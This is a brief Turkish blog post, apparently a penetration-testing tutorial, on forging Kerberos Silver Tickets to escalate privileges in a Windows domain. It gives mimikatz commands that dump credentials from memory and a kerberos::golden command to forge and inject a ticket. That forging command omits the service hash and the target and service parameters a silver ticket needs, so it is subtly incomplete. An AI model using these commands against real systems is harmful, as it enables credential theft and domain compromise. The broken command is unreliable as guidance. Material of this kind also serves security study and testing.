Kerberos | Silver Ticket

Okunması gereken yazılar:

Silver Ticket tekniğinde saldırganın amacı, hizmet veren servis hesabına ait NTLM hash’i ile TGS oluşturarak domain üzerindeki yetkilerini yükseltmektir.

Silver Ticket’ı oluşturmak için servise ait olan kullanıcının NTLM hash’in bilinmesi gerekmektedir (Bknz. Kerberoasting).

Makine üzerindeki NTLM hash’lerini almak için mimikatz’i kullanabiliriz.

mimikatz# privilege::debug
mimikatz# sekurlsa::logonpasswords

Mimikatz yardımı ile Silver Ticket’ı oluşturabiliriz.

mimikatz# kerberos::golden /user:evil /domain:pentest.local /sid:S-1-5-21-434157810-3574284310-2996746512-500  /ticket:evil.tck /ptt

Referanslar

https://www.tarlogic.com/en/blog/how-to-attack-kerberos/

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *